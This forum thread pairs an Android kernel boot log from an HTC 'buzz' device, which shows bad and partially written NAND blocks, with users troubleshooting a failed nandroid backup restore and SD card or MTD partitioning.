<5>[ 0.000000] DMA : 0xffa00000 - 0xffe00000 ( 4 MB)
<5>[ 0.000000] vmalloc : 0xe4800000 - 0xf8000000 ( 312 MB)
<5>[ 0.000000] lowmem : 0xc0000000 - 0xe4200000 ( 578 MB)
<5>[ 0.000000] modules : 0xbf000000 - 0xc0000000 ( 16 MB)
<5>[ 0.000000] .init : 0xc0008000 - 0xc002c000 ( 144 kB)
<5>[ 0.000000] .text : 0xc002c000 - 0xc04f6000 (4904 kB)
<5>[ 0.000000] .data : 0xc04f6000 - 0xc052f360 ( 229 kB)
<6>[ 0.000000] NR_IRQS:277
<4>[ 0.000000] buzz_init_irq()
<6>[ 0.000000] Calibrating delay loop... 480.05 BogoMIPS (lpj=2400256)
<6>[ 0.250122] pid_max: default: 32768 minimum: 301
<4>[ 0.250579] Mount-cache hash table entries: 512
<6>[ 0.251434] Initializing cgroup subsys cpuacct
<6>[ 0.251525] Initializing cgroup subsys freezer
<6>[ 0.251525] Initializing cgroup subsys net_cls
<6>[ 0.251556] Initializing cgroup subsys bfqio
<6>[ 0.251586] Initializing cgroup subsys timer_slack
<6>[ 0.251647] CPU: Testing write buffer coherency: ok
<6>[ 0.256469] NET: Registered protocol family 16
<4>[ 0.257446] buzz_init() revision = 0x81
<6>[ 0.257507] BT HW address=d4:20:6d:94:70:72
<6>[ 1.876647] acpu_clock_init()
<6>[ 1.877136] ACPU running at 480000 KHz
<6>[ 1.878387] ram_console: got buffer at 2d9b000, size 20000
<6>[ 1.878936] ram_console: uncorrectable error in header
<6>[ 1.879028] ram_console: no valid data in buffer (sig = 0xffffffff)
<6>[ 1.905426] console [ram-1] enabled
<6>[ 1.905761] buzz_init_mmc
<6>[ 1.908264] buzz_wifi_init: start
<4>[ 1.919372] bio: create slab <bio-0> at 0
<6>[ 1.922119] [DISP]mdp_probe: initialized
<6>[ 1.922943] msm_i2c_probe
<6>[ 1.923492] msm_i2c_probe: clk_ctl 315, 400000 Hz
<6>[ 1.927551] Bluetooth: Core ver 2.16
<6>[ 1.928070] NET: Registered protocol family 31
<6>[ 1.928375] Bluetooth: HCI device and connection manager initialized
<6>[ 1.928924] Bluetooth: HCI socket layer initialized
<6>[ 1.929229] Bluetooth: L2CAP socket layer initialized
<6>[ 1.930267] Bluetooth: SCO socket layer initialized
<6>[ 1.931182] Switching to clocksource gp_timer
<6>[ 1.934631] NET: Registered protocol family 2
<6>[ 1.935455] IP route cache hash table entries: 4096 (order: 2, 16384 bytes)
<6>[ 1.937103] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
<6>[ 1.938598] TCP bind hash table entries: 16384 (order: 4, 65536 bytes)
<6>[ 1.939666] TCP: Hash tables configured (established 16384 bind 16384)
<6>[ 1.940216] TCP reno registered
<6>[ 1.940521] UDP hash table entries: 256 (order: 0, 4096 bytes)
<6>[ 1.940856] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes)
<6>[ 1.942077] NET: Registered protocol family 1
<6>[ 1.943023] Unpacking initramfs...
<6>[ 1.975341] Freeing initrd memory: 144K
<6>[ 1.976989] [SMD]smd_init()
<6>[ 1.977294] [SMD]smd_core_init()
<6>[ 1.977600] [SMD]phy addr of smd_info.state=0x8023A0
<6>[ 1.978302] [SMD]smd_core_init() done
<3>[ 1.978607] msm_init_last_radio_log: could not retrieve SMEM_CLKREGIM_BSP
<3>[ 1.979278] _smem_log_init: no power log or log_idx allocated, smem_log disabled
<6>[ 1.980804] [SMD]smd_alloc_channel() cid=01 size=08192 'SMD_DIAG'
<6>[ 1.981658] [SMD]smd_alloc_channel() cid=02 size=08192 'SMD_RPCCALL'
<6>[ 1.984985] [SMD]SMD: ch 2 0 -> 1
<6>[ 1.985382] [SMD]smd_alloc_channel() cid=11 size=65536 'SMD_DATA5'
<6>[ 1.985687] [SMD]SMD: ch 2 1 -> 2
<6>[ 1.986602] [SMD]smd_alloc_channel() cid=12 size=08192 'SMD_DATA6'
<6>[ 1.987152] [SMD]smd_alloc_channel() cid=13 size=08192 'SMD_DATA7'
<6>[ 1.987884] [SMD]smd_alloc_channel() cid=38 size=08192 'SMD_DATA5_CNTL'
<6>[ 1.988342] [SMD]smd_alloc_channel() cid=39 size=08192 'SMD_DATA6_CNTL'
<6>[ 1.989044] [SMD]smd_alloc_channel() cid=40 size=08192 'SMD_DATA7_CNTL'
<6>[ 1.996368] Acquire 'boot-time' no_halt_lock 60s
<6>[ 1.997589] [HS_MGR] (headset_notifier_register) Register MIC_BIAS notifier
<6>[ 1.998138] [HS_MGR] (headset_notifier_update) HS_MGR driver is not ready
<7>[ 2.018249] Registered led device: flashlight
<6>[ 2.018585] [FLT]flashlight_probe: led_count = 0
<6>[ 2.019104] [FLT]flashlight_probe: The Flashlight Driver is ready
<6>[ 2.029968] atmega-microp 0-0066: microp version [06][22]
<3>[ 2.034484] microp_function_check: No function 2 !!
<6>[ 2.038024] [HS_MGR] (htc_headset_mgr_probe) ++++++++++++++++++++
<6>[ 2.040222] input: h2w headset as /devices/virtual/input/input0
<6>[ 2.041198] [HS_MGR] (hs_notify_driver_ready) HS_MGR ready
<6>[ 2.042266] [HS_MGR] (htc_headset_mgr_probe) --------------------
<6>[ 2.043060] [HS_MICROP] (htc_headset_microp_probe) ++++++++++++++++++++
<6>[ 2.047729] [HS_MGR] (headset_notifier_register) Register REMOTE_ADC notifier
<6>[ 2.048309] [HS_MGR] (headset_notifier_register) Register MIC_STATUS notifier
<6>[ 2.048614] [HS_MGR] (headset_notifier_register) Register KEY_INT_ENABLE notifier
<6>[ 2.049133] [HS_MGR] (hs_notify_driver_ready) HS_MICROP ready
<6>[ 2.049865] [HS_GPIO] (htc_headset_gpio_probe) ++++++++++++++++++++
<6>[ 2.051300] [HS_MGR] (headset_notifier_register) Register HPIN_GPIO notifier
<6>[ 2.052032] [HS_MGR] (hs_notify_driver_ready) HS_GPIO ready
<6>[ 2.052368] [HS_GPIO] (htc_headset_gpio_probe) --------------------
<6>[ 2.052917] [HS_MICROP] (htc_headset_microp_probe) --------------------
<6>[ 2.080139] [BATT] M2A_RPC: cable_update: USB at 458867027 (1970-01-01 00:00:00.458257102 UTC)
<6>[ 2.081024] [BATT] htc_cable_status_update: 0 -> 1
<6>[ 2.081329] [USB] msm_hsusb_set_vbus_state: 1
<6>[ 2.083099] ashmem: initialized
<6>[ 2.084472] [BATT] A2M_RPC: get_batt_info: batt_id=1, batt_vol=3893, batt_temp=309, batt_current=1017, level=72, charging_source=1, charging_enabled=1, full_bat=1300000, over_vchg=0 at 463716046 (1970-01-01 00:00:00.462557151 UTC)
<5>[ 2.087890] Slow work thread pool: Starting up
<5>[ 2.101501] Slow work thread pool: Ready
<6>[ 2.102264] fuse init (API version 7.14)
<6>[ 2.104644] aufs 2.1-standalone.tree-35-20110418
<4>[ 2.104980] yaffs May 2 2012 14:03:42 Installing.
<6>[ 2.116912] io scheduler noop registered
<6>[ 2.117492] io scheduler bfq registered
<6>[ 2.118041] io scheduler sio registered (default)
<6>[ 2.118316] io scheduler vr registered
<6>[ 2.119354] [DISP]mddi: init() base=0xe4814000 irq=16
<7>[ 2.120178] [DISP]mddi runs at 81920000
<6>[ 2.122161] [DISP]mddi cmd send rtd: int 3a000, stat 8063, rtd val 10
<6>[ 2.125061] [DISP]mddi: registering panel mddi_c_0101_04d1
<6>[ 2.125366] [DISP]mddi: publish:
<7>[ 2.128784] [DISP]mddi_s6d04d1_probe: enter.
<6>[ 2.129547] [DISP]vsync on gpio 97 now 0
<6>[ 2.129852] [DISP]CABC enabled
<7>[ 2.131408] Registered led device: lcd-backlight
<6>[ 2.133544] [DISP]msmfb_probe() installing 240 x 320 panel
<6>[ 2.137268] PRUE G
<6>[ 2.137908] msm_serial_hs.0: ttyHS0 at MMIO 0xa0200000 (irq = 45) is a MSM HS UART
<6>[ 2.139251] msm_serial_hs module loaded
<6>[ 2.139923] [BT]msm_serial_hs module loaded
<6>[ 2.141357] [BT]msm_serial_hs module loaded
<6>[ 2.142852] [BT]msm_serial_hs module loaded
<6>[ 2.149993] loop: module loaded
<6>[ 2.150695] pmem: 1 init
<6>[ 2.151824] pmem_adsp: 0 init
<6>[ 2.153259] pmem_camera: 0 init
<6>[ 2.155090] spi_bma150_probe: G-sensor connect with microP: start initial, kvalue = 0x0
<6>[ 2.165435] [GSNR] Gsensor disable
<6>[ 2.167724] msm_nand: allocated dma buffer at ffa47000, dma_addr 26ecc000
<6>[ 2.168334] status: c03120
<6>[ 2.168640] nandid: 5500bcec maker ec device bc
<6>[ 2.169158] Found a supported NAND device
<6>[ 2.169433] NAND Id : 0xBCEC
<6>[ 2.169738] Buswidth : 16 Bits
<6>[ 2.170257] Density : 512 MByte
<6>[ 2.170532] Pagesize : 2048 Bytes
<6>[ 2.170806] Erasesize: 131072 Bytes
<6>[ 2.171295] Oobsize : 64 Bytes
<6>[ 2.171691] msm_nand: read CFG0 = aa5400c0, CFG1 = 8746a
<6>[ 2.172149] CFG0 Init : 0xe85408c0
<6>[ 2.172668] CFG1 Init : 0x0008746a
<6>[ 2.172943] CFG0: cw/page=3 ud_sz=516 ecc_sz=10 spare_sz=0 num_addr_cycles=5
<6>[ 2.173553] DEV_CMD1: f00f3000
<6>[ 2.173889] <6>NAND_EBI2_ECC_BUF_CFG: 1ff
<5>[ 2.174255] 6 cmdlinepart partitions found on MTD device msm_nand
<5>[ 2.174774] Creating 6 MTD partitions on "msm_nand":
<5>[ 2.175140] 0x00001ff60000-0x000020000000 : "misc"
<5>[ 2.178192] 0x000002760000-0x000002b80000 : "recovery"
<5>[ 2.184356] 0x000002b80000-0x000002e40000 : "boot"
<5>[ 2.189056] 0x000002e40000-0x000009c40000 : "system"
<6>[ 2.214324] [SMD]smd_alloc_channel() cid=27 size=08192 'SMD_GPSNMEA'
<5>[ 2.324920] 0x000009c40000-0x00000ab40000 : "cache"
<6>[ 2.337524] [SMD]smd_alloc_channel() cid=00 size=08192 'SMD_DS'
<6>[ 2.338500] [SMD]smd_alloc_channel() cid=07 size=08192 'SMD_DATA1'
<6>[ 2.339569] [SMD]smd_alloc_channel() cid=08 size=08192 'SMD_DATA2'
<6>[ 2.340545] [SMD]smd_alloc_channel() cid=09 size=08192 'SMD_DATA3'
<6>[ 2.341217] [SMD]smd_alloc_channel() cid=10 size=08192 'SMD_DATA4'
<6>[ 2.342712] [SMD]smd_alloc_channel() cid=15 size=65536 'SMD_DATA9'
<5>[ 2.348907] 0x00000ab40000-0x00001ff60000 : "userdata"
<6>[ 2.694793] PPP generic driver version 2.4.2
<6>[ 2.695587] PPP Deflate Compression module registered
<6>[ 2.695892] PPP BSD Compression module registered
<6>[ 2.699340] PPP MPPE Compression module registered
<6>[ 2.699676] NET: Registered protocol family 24
<6>[ 2.701385] tun: Universal TUN/TAP device driver, 1.6
<6>[ 2.701690] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
<6>[ 2.706115] [USB] msm72k_probe
<6>[ 2.706451] [USB] accessory detect 1
<6>[ 2.706726] [USB] id_pin_gpio 19
<6>[ 2.707000] [USB] dock detect 0
<6>[ 2.707275] [USB] dock pin gpio 0
<6>[ 2.707763] [USB] msm72k_probe() io=e481c000, irq=47, dma=ffa48000(26ef6000)
<6>[ 2.710296] android init
<6>[ 2.710784] android_probe pdata: c0509938
<6>[ 2.711273] android_bind
<7>[ 2.711578] android_bind_config
<6>[ 2.712707] android_usb gadget: android_usb ready
<6>[ 2.713012] [USB] msm72k_udc: registered gadget driver 'android_usb'
<6>[ 2.713775] f_adb init
<6>[ 2.714050] android_register_function adb
<6>[ 2.714355] f_mass_storage init
<6>[ 2.714996] fsg_probe pdev: c0509a98, pdata: c050a484
<6>[ 2.715454] android_register_function usb_mass_storage
<6>[ 2.715728] f_rndis init
<6>[ 2.716491] android_register_function rndis
<6>[ 2.716766] f_accessory init
<6>[ 2.717041] android_register_function accessory
<6>[ 2.717559] diag init
<6>[ 2.717864] android_register_function diag
<6>[ 2.718170] rndis_function_bind_config MAC: 00:00:00:00:00:00
<4>[ 2.718841] android_usb gadget: using random self ethernet address
<4>[ 2.719177] android_usb gadget: using random host ethernet address
<6>[ 2.721954] acc_bind_config
<6>[ 2.723724] [USB] hsusb: IDLE -> ONLINE
<6>[ 2.724060] [USB] lpm exit
<6>[ 2.724639] [USB] hsusb: reset controller
<6>[ 2.725219] android_usb gadget: Mass Storage Function, version: 2009/09/11
<6>[ 2.725524] android_usb gadget: Number of LUNs=1
<6>[ 2.726074] lun0: LUN: removable file: (no medium)
<6>[ 2.726623] adb_bind_config
<6>[ 2.727661] diag_bind_config
<6>[ 2.728210] [SMD]SMD: ch 1 0 -> 1
<6>[ 2.728546] [SMD]SMD: ch 1 1 -> 2
<6>[ 2.729675] buzz_syn_ts_power: power 1
<6>[ 2.762145] msm_hsusb_phy_reset
<6>[ 2.912231] [USB] ulpi: write 0x2c to 0x31
<6>[ 2.912536] [USB] ulpi: write 0x20 to 0x32
<6>[ 2.913024] [USB] ulpi: write 0x01 to 0x0d
<6>[ 2.913299] [USB] ulpi: write 0x01 to 0x10
<6>[ 2.913604] [USB] handle_notify_offline: notify offline
<6>[ 2.914154] [USB] msm_hsusb: enable pullup
<6>[ 2.917449] [USB] suspend
<6>[ 2.932250] [USB] not AC charger
<6>[ 2.932800] [USB] accessory_detect_init: id pin 19
<6>[ 2.993591] synaptics_ts_probe: panel_version: 301
<6>[ 2.995056] max_x: 3DE, max_y: 5A6
<6>[ 2.996887] synaptics_ts_probe: max_x 990, max_y 1446
<6>[ 2.997161] input_set_abs_params: mix_x 0, max_x 990, min_y 0, max_y 1300
<6>[ 2.998229] input: synaptics-rmi-touchscreen as /devices/virtual/input/input1
<6>[ 2.999450] synaptics_ts_probe: Start touchscreen synaptics-rmi-touchscreen in interrupt mode
<6>[ 3.000122] atmel_ts_init():
<6>[ 3.000915] buzz_ts_atmel_power():
<6>[ 3.023895] [USB] reset
<6>[ 3.024291] [USB] send connect type 1
<6>[ 3.024566] [BATT] online=1
<6>[ 3.024841] [BATT] Update SMEM: cable type 1 at 1403189275 (1970-01-01 00:00:01.402670622 UTC)
<6>[ 3.026184] [USB] portchange USB_SPEED_HIGH
<6>[ 3.184234] [USB] reset
<6>[ 3.186492] [USB] portchange USB_SPEED_HIGH
<6>[ 3.282318] No Messages after reset
<3>[ 3.282989] msm_i2c msm_i2c.0: error, status c8 (4A,00,01)(20,13,01)(cnt:7,pos:0)
<3>[ 3.283325] msm_i2c msm_i2c.0: Error during data xfer (-5) (4A,00,01)
<6>[ 3.283874] No Atmel chip inside
<4>[ 3.284362] atmel_qt602240: probe of 0-004a failed with error -5
<6>[ 3.285217] [PS][CM3602] capella_cm3602_probe: probe
<6>[ 3.286346] input: proximity as /devices/virtual/input/input2
<6>[ 3.287506] [PS][CM3602] capella_cm3602_setup
<6>[ 3.288635] [KEY] GPIO Matrix Keypad Driver: Start keypad matrix for buzz-keypad... in interrupt mode
<6>[ 3.289764] [KEY] GPIO_Input_ISR : 0, return IRQ_HANDLED;
<6>[ 3.290252] [KEY] GPIO Input Driver: Start gpio inputs for buzz-keypad... in interrupt mode
<6>[ 3.291442] input: buzz-keypad as /devices/virtual/input/input3
<6>[ 3.292602] input: buzz-nav as /devices/virtual/input/input4
<6>[ 3.294708] input: lightsensor-level as /devices/virtual/input/input5
<6>[ 3.295867] [KEY] gpio_keys_scan_keys: key 1-116, 0 (20) changed to 0
<6>[ 3.296295] [LS][CM3602] set_ls_kvalue: ALS calibrated als_kadc=0x6da5007b
<6>[ 3.296813] [LS][CM3602] set_ls_kvalue: als_kadc=0x7b, als_gadc=0xcf
<6>[ 3.297088] [LS][CM3602] ls_table: data[0] , data[0] = 0, 0
<6>[ 3.297607] [LS][CM3602] ls_table: data[1] , data[1] = 0, 1
<6>[ 3.297882] [LS][CM3602] ls_table: data[2] , data[2] = 0, 2
<6>[ 3.298370] [LS][CM3602] ls_table: data[3] , data[3] = 0, 8
<6>[ 3.298645] [LS][CM3602] ls_table: data[4] , data[4] = 0, 16
<6>[ 3.299163] [LS][CM3602] ls_table: data[5] , data[5] = 0, 59
<6>[ 3.299438] [LS][CM3602] ls_table: data[6] , data[6] = 0, a2
<6>[ 3.299957] [LS][CM3602] ls_table: data[7] , data[7] = 0, b1
<6>[ 3.300231] [LS][CM3602] ls_table: data[8] , data[8] = 0, bf
<6>[ 3.300720] [LS][CM3602] ls_table: data[9] , data[9] = 3, ff
<7>[ 3.303375] __capella_cm3602_power: Turn the capella_cm3602 power on
<6>[ 3.305236] input: curcial-oj as /devices/virtual/input/input6
<3>[ 3.307250] curcial_oj_poweron:OJ:power status ok
<6>[ 3.356567] OpticalJoystick Device ID: 0d
<6>[ 3.359466] OJ Driver: Revision : 02
<6>[ 3.362548] OJ: driver loaded
<6>[ 3.365692] using rtc device, msm_rtc, for alarms
<6>[ 3.366058] rs30000048:915823fc rs30000048:915823fc: rtc core: registered msm_rtc as rtc0
<6>[ 3.367004] AKM8973 compass driver: init
<6>[ 3.368713] input: compass as /devices/virtual/input/input7
<6>[ 3.370635] [FLT]adp1650 Led Flash driver: init
<4>[ 3.371124] [CAM]s5k4e1gx_init
<4>[ 3.371643] [CAM]__s5k4e1gx_probe
<6>[ 3.372161] [CAM]s5k4e1gx_vreg_enable camera vreg on
<6>[ 3.372772] [CAM]sctrl.node 0
<4>[ 3.373046] [CAM]s5k4e1gx_sensor_probe()
<6>[ 3.373657] [CAM]s5k4e1gx_probe called!
<6>[ 3.424224] [CAM]s5k4e1gx_probe successed! rc = 0
<6>[ 3.424652] [CAM]s5k4e1gx s->node 0
<6>[ 3.437164] android_usb gadget: high speed config #1: android
<6>[ 3.471588] [CAM]s5k4e1gx_sensor_init(): reseting sensor.
<6>[ 3.472961] [CAM]sensor_lc_disable=0
<4>[ 3.568450] [CAM]sensor evt version : 0x10
<4>[ 3.568725] [CAM]use analog_settings_evt3
<6>[ 3.580780] s5k4e1gx_sysfs_init : kobject_create_and_add
<6>[ 3.581146] s5k4e1gx_sysfs_init : sysfs_create_file
<6>[ 3.583343] device-mapper: uevent: version 1.0.3
<6>[ 3.584838] device-mapper: ioctl: 4.17.0-ioctl (2010-03-05) initialised: [email protected]
<6>[ 3.585510] Bluetooth: HCI UART driver ver 2.2
<6>[ 3.585784] Bluetooth: HCI H4 protocol initialized
<6>[ 3.587799] cpuidle: using governor ladder
<6>[ 3.588104] cpuidle: using governor menu
<6>[ 3.589965] mmc0: Qualcomm MSM SDCC at 0x00000000a0400000 irq 24,0 dma 8
<6>[ 3.590484] mmc0: Platform slot type: N/A
<6>[ 3.590759] mmc0: 4 bit data mode enabled
<6>[ 3.591278] mmc0: 8 bit data mode disabled
<6>[ 3.591552] mmc0: MMC clock 144000 -> 49152000 Hz, PCLK 80000000 Hz
<6>[ 3.591827] mmc0: Slot eject status = 1
<6>[ 3.592437] mmc0: Power save feature enable = 1
<6>[ 3.592712] mmc0: DM non-cached buffer at ffa4a000, dma_addr 0x26f55000
<6>[ 3.593231] mmc0: DM cmd busaddr 0x26f55000, cmdptr busaddr 0x26f55300
<6>[ 3.594573] buzz_sdslot_switchvdd: Disabling SD slot power
<6>[ 3.595428] mmc1: Qualcomm MSM SDCC at 0x00000000a0500000 irq 26,102 dma 8
<6>[ 3.595733] mmc1: Platform slot type: SD
<6>[ 3.596221] mmc1: 4 bit data mode enabled
<6>[ 3.596496] mmc1: 8 bit data mode disabled
<6>[ 3.596984] mmc1: MMC clock 144000 -> 49152000 Hz, PCLK 80000000 Hz
<6>[ 3.597259] mmc1: Slot eject status = 1
<6>[ 3.597534] mmc1: Power save feature enable = 1
<6>[ 3.598022] mmc1: DM non-cached buffer at ffa4b000, dma_addr 0x26f56000
<6>[ 3.598327] mmc1: DM cmd busaddr 0x26f56000, cmdptr busaddr 0x26f56300
<7>[ 3.599487] Registered led device: amber
<7>[ 3.600006] Registered led device: green
<7>[ 3.600677] Registered led device: jogball-backlight
<7>[ 3.601135] Registered led device: button-backlight
<6>[ 3.601654] microp_led_probe: succeeded
<6>[ 3.604522] logger: created 256K log 'log_main'
<6>[ 3.605133] logger: created 256K log 'log_events'
<6>[ 3.605926] logger: created 256K log 'log_radio'
<6>[ 3.606445] logger: created 256K log 'log_system'
<6>[ 3.607299] zram: num_devices not specified. Using default: 1
<6>[ 3.607574] zram: Creating 1 devices ...
<6>[ 3.609008] GACT probability NOT on
<6>[ 3.609558] Mirror/redirect action on
<6>[ 3.609832] u32 classifier
<6>[ 3.610076] Actions configured
<6>[ 3.610595] Netfilter messages via NETLINK v0.30.
<6>[ 3.611083] nf_conntrack version 0.5.0 (4996 buckets, 19984 max)
<4>[ 3.611846] CONFIG_NF_CT_ACCT is deprecated and will be removed soon. Please use
<4>[ 3.612518] nf_conntrack.acct=1 kernel parameter, acct=1 nf_conntrack module option or
<4>[ 3.613037] sysctl net.netfilter.nf_conntrack_acct=1 to enable it.
<6>[ 3.613647] ctnetlink v0.93: registering with nfnetlink.
<6>[ 3.614288] NF_TPROXY: Transparent proxy support initialized, version 4.1.0
<6>[ 3.614593] NF_TPROXY: Copyright (c) 2006-2007 BalaBit IT Ltd.
<6>[ 3.615936] xt_time: kernel timezone is -0000
<6>[ 3.616363] IPv4 over IPv4 tunneling driver
<6>[ 3.617950] GRE over IPv4 tunneling driver
<6>[ 3.619628] ip_tables: (C) 2000-2006 Netfilter Core Team
<6>[ 3.620452] arp_tables: (C) 2002 David S. Miller
<6>[ 3.620880] TCP cubic registered
<6>[ 3.621704] NET: Registered protocol family 10
<6>[ 3.626342] Mobile IPv6
<6>[ 3.626800] ip6_tables: (C) 2000-2006 Netfilter Core Team
<6>[ 3.627410] IPv6 over IPv4 tunneling driver
<6>[ 3.630920] NET: Registered protocol family 17
<6>[ 3.631317] NET: Registered protocol family 15
<6>[ 3.632507] Bluetooth: RFCOMM socket layer initialized
<6>[ 3.633026] Bluetooth: RFCOMM ver 1.11
<6>[ 3.633361] Bluetooth: BNEP (Ethernet Emulation) ver 1.3
<6>[ 3.633850] Bluetooth: HIDP (Human Interface Emulation) ver 1.2
<6>[ 3.634796] clock_late_init() disabled 16 unused clocks
<6>[ 3.635345] [Port list] init()
<6>[ 3.635620] [Port list] Virtual Address for port_list: [f8149a48]
<6>[ 3.636108] [Port list] Physical Address for port_list: [849A48]
<6>[ 3.637756] cpufreq: cpu0 init at 480000 switching to 352000
<6>[ 3.642211] rs30000048:915823fc rs30000048:915823fc: setting system clock to 2013-12-16 11:43:36 UTC (1387194216)
<4>[ 3.643127] Warning: unable to open an initial console.
<6>[ 3.643981] Freeing init memory: 144K
<6>[ 3.918975] keychord: using input dev h2w headset for fevent
<6>[ 3.919464] keychord: using input dev buzz-keypad for fevent
<6>[ 3.926330] yaffs: dev is 32505859 name is "mtdblock3"
<6>[ 3.926757] yaffs: passed flags ""
<4>[ 3.927001] yaffs: Attempting MTD mount on 31.3, "mtdblock3"
<4>[ 4.099121] yaffs: restored from checkpoint
<4>[ 4.100067] yaffs_read_super: isCheckpointed 1
<6>[ 4.103546] yaffs: dev is 32505861 name is "mtdblock5"
<6>[ 4.104003] yaffs: passed flags ""
[COLOR="Red"]<4>[ 4.104248] yaffs: Attempting MTD mount on 31.5, "mtdblock5"
<4>[ 4.712463] block 725 is bad
<4>[ 4.744262] block 845 is bad
<4>[ 4.797912] block 1049 is bad[/COLOR]
<4>[ 18.353271] Partially written block 1006 detected
<4>[ 18.353942] Partially written block 1006 detected
<4>[ 18.354339] Partially written block 1006 detected
<4>[ 18.354766] Partially written block 1006 detected
<4>[ 18.355346] Partially written block 1006 detected
<4>[ 18.355773] Partially written block 1006 detected
<4>[ 18.356353] Partially written block 1006 detected
<4>[ 18.356781] Partially written block 1006 detected
<4>[ 18.357360] Partially written block 1006 detected
<4>[ 18.357788] Partially written block 1006 detected
<4>[ 18.358184] Partially written block 1006 detected
<4>[ 18.358795] Partially written block 1006 detected
<4>[ 18.359191] Partially written block 1006 detected
<4>[ 18.359802] Partially written block 1006 detected
<4>[ 18.360198] Partially written block 1006 detected
<4>[ 18.360595] Partially written block 1006 detected
<4>[ 18.361206] Partially written block 1006 detected
<4>[ 18.361633] Partially written block 1006 detected
<4>[ 18.362213] Partially written block 1006 detected
<4>[ 18.362640] Partially written block 1006 detected
<4>[ 18.363250] Partially written block 1006 detected
<4>[ 18.363677] Partially written block 1006 detected
<4>[ 18.364105] Partially written block 1006 detected
<4>[ 18.364715] Partially written block 1006 detected
<4>[ 18.460662] yaffs_read_super: isCheckpointed 0
<6>[ 18.461517] yaffs: dev is 32505860 name is "mtdblock4"
<6>[ 18.461791] yaffs: passed flags ""
<4>[ 18.462005] yaffs: Attempting MTD mount on 31.4, "mtdblock4"
<4>[ 18.521240] yaffs_read_super: isCheckpointed 0
<3>[ 20.180206] init: service 'console' requires console
<6>[ 20.258422] enabling adb
<6>[ 20.281280] [USB] msm_hsusb: disable pullup
<6>[ 20.293457] [USB] msm_hsusb: enable pullup
<6>[ 20.297027] [USB] suspend
<6>[ 20.311981] adb_open
<6>[ 20.482727] [USB] reset
<6>[ 20.483032] [USB] handle_notify_offline: notify offline
<6>[ 20.484069] adb_release
<6>[ 20.485015] [USB] portchange USB_SPEED_HIGH
<6>[ 20.485534] adb_open
<6>[ 20.642822] [USB] reset
<6>[ 20.645080] [USB] portchange USB_SPEED_HIGH
<6>[ 20.715698] warning: `rild' uses 32-bit capabilities (legacy support in use)
<6>[ 20.854614] android_usb gadget: high speed config #1: android
<6>[ 20.928436] [SMD]SMD: ch 0 0 -> 1
<6>[ 20.928771] [SMD]SMD: ch 0 1 -> 2
<6>[ 20.939819] [SMD]SMD: ch 38 0 -> 1
<6>[ 20.940155] [SMD]SMD: ch 38 1 -> 2
<6>[ 20.940368] [RIL] qmi: smd opened
<6>[ 20.942810] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 20.947113] [SMD]SMD: ch 39 0 -> 1
<6>[ 20.947448] [SMD]SMD: ch 39 1 -> 2
<6>[ 20.947875] [RIL] qmi: smd opened
<6>[ 20.948699] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 20.950500] [SMD]SMD: ch 40 0 -> 1
<6>[ 20.951080] [SMD]SMD: ch 40 1 -> 2
<6>[ 20.951324] [RIL] qmi: smd opened
<6>[ 20.952941] [RIL] qmi: ctl: wds use client_id 0x01
<6>[ 22.985412] [AUD][snd.c:snd_ioctl] snd_set_device 1 1 1
<6>[ 22.989074] [AUD][snd.c:snd_rpc_thread] snd_rpc_thread() start
<6>[ 22.989624] [AUD][snd.c:snd_rpc_thread] snd: rpc_reply status 0
<6>[ 22.992858] [AUD][snd.c:snd_ioctl] snd_set_volume 256 0 5
<6>[ 22.996887] [AUD][snd.c:snd_rpc_thread] snd: rpc_reply status 0
As you can see
<4>[ 4.104248] yaffs: Attempting MTD mount on 31.5, "mtdblock5"
<4>[ 4.712463] block 725 is bad
<4>[ 4.744262] block 845 is bad
<4>[ 4.797912] block 1049 is bad
Does that indicate bad blocks on SDCard ?
So I have reviewed your logcat and it's not showing up anything that could make it bootloop :/ Can you use nandroid manager to restore just the app data and see how it gets on for me? It shouldn't need to reboot to do it.
heavy_metal_man said:
So I have reviewed your logcat and it's not showing up anything that could make it bootloop :/ Can you use nandroid manager to restore just the app data and see how it gets on for me? It shouldn't need to reboot to do it.
Okay, thanks, I restored some user apps and system apps (including data). Some apps are working fine and restored back to previous state including CM Settings but some apps got messed up and data didn't get restored.
What should be the next move?
optimusodd said:
Okay, thanks, I restored some user apps and system apps (including data). Some apps are working fine and restored back to previous state including CM Settings but some apps got messed up and data didn't get restored.
What should be the next move?
Well that tells us that the nandroid backup has become corrupted somehow, or your sdcard partition is not the same as your nandroid's. If it's corruption you're pretty stuffed and will have to just start fresh, but I would first double check your partitioning and then attempt a final restore with nandroid manager. If it fails then delete the apps that don't work data and keep what works I suppose :/
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
Well that tells us that the nandroid backup has become corrupted somehow, or your sdcard partition is not the same as your nandroid's. If it's corruption you're pretty stuffed and will have to just start fresh, but I would first double check your partitioning and then attempt a final restore with nandroid manager.
Thanks for the reply.
Huh, what do you mean by sdcard partition is not the same?
Okay, let me go into a little more detail. A few months back I was using an 8GB card. And the nandroid backup I want to restore was taken on that card.
MTD partition size : 110 10
Ext3 :512 MB
Now I am using 16GB card with 1GB Ext3 partition.
No custom MTD partition.
Do I need to run custom MTD script ?
SDCard partition could be a problem if I was using a card of less capacity. But as both the memory capacity and the size of Ext3 partition are larger in this scenario, I think partition should not be a problem.
Correct me if I am wrong.
Furthermore, the same nandroid backup got restored perfectly using the new card before that kernel and radio thing. Gah!
optimusodd said:
Thanks for the reply.
Huh, what do you mean by sdcard partition is not the same?
Okay, let me go into a little more detail. A few months back I was using an 8GB card. And the nandroid backup I want to restore was taken on that card.
MTD partition size : 110 10
Ext3 :512 MB
Now I am using 16GB card with 1GB Ext3 partition.
No custom MTD partition.
Do I need to run custom MTD script ?
SDCard partition could be a problem if I was using a card of less capacity. But as both the memory capacity and the size of Ext3 partition are larger in this scenario, I think partition should not be a problem.
Correct me if I am wrong.
Furthermore, the same nandroid backup got restored perfectly using the new card before that kernel and radio thing. Gah!
If you made the nandroid with a custom mtd then you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
heavy_metal_man said:
If you made the nandroid with a custom mtd then you had best restore it with a custom mtd. I'm not 100% sure how it's done or the theory around it though, it's been a long time since I've had to do such things.
Sent from my HTC Sensation XE with Beats Audio Z715e using Tapatalk
Alright, buddy, I'll give it a try. :fingers-crossed:
